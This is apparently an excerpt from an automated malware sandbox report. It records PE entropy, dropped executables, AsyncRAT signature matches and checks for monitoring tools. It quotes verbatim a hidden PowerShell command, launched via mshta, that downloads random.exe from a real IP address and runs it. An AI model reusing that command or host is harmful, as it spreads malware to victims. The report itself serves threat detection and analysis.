                                Source: random[2].exe2.14.drStatic PE information: real checksum: 0x214fee should be: 0x21625f
                                Source: c7f37422c5.exe.14.drStatic PE information: real checksum: 0x214fee should be: 0x21625f
                                Source: 9c1024a1f1.exe.14.drStatic PE information: real checksum: 0x209862 should be: 0x203baa
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name:
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name: .idata
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name:
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name: rtrxnzik
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name: vyhzfbjm
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name: .taggant
                                Source: skotes.exe.11.drStatic PE information: section name:
                                Source: skotes.exe.11.drStatic PE information: section name: .idata
                                Source: skotes.exe.11.drStatic PE information: section name:
                                Source: skotes.exe.11.drStatic PE information: section name: rtrxnzik
                                Source: skotes.exe.11.drStatic PE information: section name: vyhzfbjm
                                Source: skotes.exe.11.drStatic PE information: section name: .taggant
                                Source: random[1].exe.14.drStatic PE information: section name: .symtab
                                Source: 33c3d7c7bd.exe.14.drStatic PE information: section name: .symtab
                                Source: random[1].exe0.14.drStatic PE information: section name:
                                Source: random[1].exe0.14.drStatic PE information: section name: .idata
                                Source: random[1].exe0.14.drStatic PE information: section name:
                                Source: random[1].exe0.14.drStatic PE information: section name: ndccpyxw
                                Source: random[1].exe0.14.drStatic PE information: section name: hexaatse
                                Source: random[1].exe0.14.drStatic PE information: section name: .taggant
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name:
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name: .idata
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name:
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name: ndccpyxw
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name: hexaatse
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name: .taggant
                                Source: random[1].exe1.14.drStatic PE information: section name:
                                Source: random[1].exe1.14.drStatic PE information: section name: .idata
                                Source: random[1].exe1.14.drStatic PE information: section name:
                                Source: random[1].exe1.14.drStatic PE information: section name: gdiknbhi
                                Source: random[1].exe1.14.drStatic PE information: section name: bcaisgyr
                                Source: random[1].exe1.14.drStatic PE information: section name: .taggant
                                Source: 935372fb1f.exe.14.drStatic PE information: section name:
                                Source: 935372fb1f.exe.14.drStatic PE information: section name: .idata
                                Source: 935372fb1f.exe.14.drStatic PE information: section name:
                                Source: 935372fb1f.exe.14.drStatic PE information: section name: gdiknbhi
                                Source: 935372fb1f.exe.14.drStatic PE information: section name: bcaisgyr
                                Source: 935372fb1f.exe.14.drStatic PE information: section name: .taggant
                                Source: random[2].exe2.14.drStatic PE information: section name:
                                Source: random[2].exe2.14.drStatic PE information: section name: .idata
                                Source: random[2].exe2.14.drStatic PE information: section name:
                                Source: random[2].exe2.14.drStatic PE information: section name: ndmxoxsq
                                Source: random[2].exe2.14.drStatic PE information: section name: subumggu
                                Source: random[2].exe2.14.drStatic PE information: section name: .taggant
                                Source: c7f37422c5.exe.14.drStatic PE information: section name:
                                Source: c7f37422c5.exe.14.drStatic PE information: section name: .idata
                                Source: c7f37422c5.exe.14.drStatic PE information: section name:
                                Source: c7f37422c5.exe.14.drStatic PE information: section name: ndmxoxsq
                                Source: c7f37422c5.exe.14.drStatic PE information: section name: subumggu
                                Source: c7f37422c5.exe.14.drStatic PE information: section name: .taggant
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00980A76 push ecx; ret 0_2_00980A89
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CAB3F push dword ptr [ecx-75h]; iretd 0_2_009CAB44
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CAC7D push dword ptr [ecx-75h]; iretd 0_2_009CAC82
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD106500BD pushad ; iretd 9_2_00007FFD106500C1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD1072260C push 8B485F93h; iretd 9_2_00007FFD10722611
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_006ED91C push ecx; ret 14_2_006ED92F
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B98EF0 push es; ret 15_3_00B99041
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B98EF0 push es; ret 15_3_00B99041
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B9900A push es; ret 15_3_00B99041
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B9900A push es; ret 15_3_00B99041
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B8E044 push 9800B8CBh; retf 15_3_00B8E049
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B8DFD0 push eax; retf 15_3_00B8E041
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B98EF0 push es; ret 15_3_00B99041
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B98EF0 push es; ret 15_3_00B99041
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B9900A push es; ret 15_3_00B99041
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B9900A push es; ret 15_3_00B99041
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D669C push eax; ret 15_3_059D669D
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D669C push eax; ret 15_3_059D669D
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D669C push eax; ret 15_3_059D669D
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059DCB52 push eax; retf 15_3_059DCB61
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059DCB52 push eax; retf 15_3_059DCB61
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059DCB52 push eax; retf 15_3_059DCB61
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059DCB62 pushad ; retf 15_3_059DCB71
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059DCB62 pushad ; retf 15_3_059DCB71
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059DCB62 pushad ; retf 15_3_059DCB71
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D669C push eax; ret 15_3_059D669D
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D669C push eax; ret 15_3_059D669D
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059D669C push eax; ret 15_3_059D669D
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059DCB52 push eax; retf 15_3_059DCB61
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059DCB52 push eax; retf 15_3_059DCB61
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_059DCB52 push eax; retf 15_3_059DCB61
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name: entropy: 7.105636274880829
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name: rtrxnzik entropy: 7.953483509677053
                                Source: skotes.exe.11.drStatic PE information: section name: entropy: 7.105636274880829
                                Source: skotes.exe.11.drStatic PE information: section name: rtrxnzik entropy: 7.953483509677053
                                Source: random[1].exe0.14.drStatic PE information: section name: entropy: 7.176715017904416
                                Source: random[1].exe0.14.drStatic PE information: section name: ndccpyxw entropy: 7.953467525882589
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name: entropy: 7.176715017904416
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name: ndccpyxw entropy: 7.953467525882589
                                Source: random[1].exe1.14.drStatic PE information: section name: entropy: 7.9332071022094555
                                Source: random[1].exe1.14.drStatic PE information: section name: gdiknbhi entropy: 7.95124476904847
                                Source: 935372fb1f.exe.14.drStatic PE information: section name: entropy: 7.9332071022094555
                                Source: 935372fb1f.exe.14.drStatic PE information: section name: gdiknbhi entropy: 7.95124476904847
                                Source: random[2].exe2.14.drStatic PE information: section name: entropy: 7.937516755296097
                                Source: random[2].exe2.14.drStatic PE information: section name: ndmxoxsq entropy: 7.9512778633809855
                                Source: c7f37422c5.exe.14.drStatic PE information: section name: entropy: 7.937516755296097
                                Source: c7f37422c5.exe.14.drStatic PE information: section name: ndmxoxsq entropy: 7.9512778633809855
                                Source: random[2].exe.14.dr, s1l70P8mWLYDmBOs6L.csHigh entropy of concatenated method names: 'VAYPi0gMpB', 'nW4lBacjpc', 'yJ9PnvReTK', 'GevPEs5ZlO', 'gkNPK4v4fw', 'o7SPNXHjF0', 'KmAZJZ5bsD', 'Fupap7L4k', 'r4yl3DrYU', 'rewL2KpDf'
                                Source: random[2].exe.14.dr, cVtkWMF9BXSUpNpZaGX.csHigh entropy of concatenated method names: 'cMXGkimXqS', 'yhcGJJVgWb', 'RTMG9LTTMo', 'nmhGrPX3O8', 'wLgGAj6lSy', 'KeNG22TvML', 'xfBGmYjwkH', 'e3bFNlGvVM', 'd2AGYe9bE9', 'HbuGuZGGpK'
                                Source: f891ed3167.exe.14.dr, s1l70P8mWLYDmBOs6L.csHigh entropy of concatenated method names: 'VAYPi0gMpB', 'nW4lBacjpc', 'yJ9PnvReTK', 'GevPEs5ZlO', 'gkNPK4v4fw', 'o7SPNXHjF0', 'KmAZJZ5bsD', 'Fupap7L4k', 'r4yl3DrYU', 'rewL2KpDf'
                                Source: f891ed3167.exe.14.dr, cVtkWMF9BXSUpNpZaGX.csHigh entropy of concatenated method names: 'cMXGkimXqS', 'yhcGJJVgWb', 'RTMG9LTTMo', 'nmhGrPX3O8', 'wLgGAj6lSy', 'KeNG22TvML', 'xfBGmYjwkH', 'e3bFNlGvVM', 'd2AGYe9bE9', 'HbuGuZGGpK'
                                Source: random[2].exe0.14.dr, IAYNcYxlTFn1TcgV7Nc.csHigh entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'
                                Source: random[2].exe0.14.dr, PjMboxrZKVMRiayL4T.csHigh entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
                                Source: f8e8a2d2f0.exe.14.dr, IAYNcYxlTFn1TcgV7Nc.csHigh entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'
                                Source: f8e8a2d2f0.exe.14.dr, PjMboxrZKVMRiayL4T.csHigh entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'

                                Persistence and Installation Behavior

                                barindex
                                Drops PE files with a suspicious file extension
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comFile created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comJump to dropped file
                                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comJump to dropped file
                                Tries to download and execute files (via powershell)
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\random[2].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[2].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comFile created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[2].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeJump to dropped file
                                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeJump to dropped file

                                Boot Survival

                                barindex
                                Yara detected AsyncRAT
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22786943881.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22790546318.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787546897.00000000049C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.22807614059.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22790546318.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22795694035.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22795694035.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.00000000049AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.22834742123.0000000001402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Macromedia.com PID: 3540, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AchillesGuard.com PID: 2308, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1884, type: MEMORYSTR
                                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeWindow searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeWindow searched: window name: Regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeWindow searched: window name: Filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeWindow searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeWindow searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Uses schtasks.exe or at.exe to add and modify task schedules
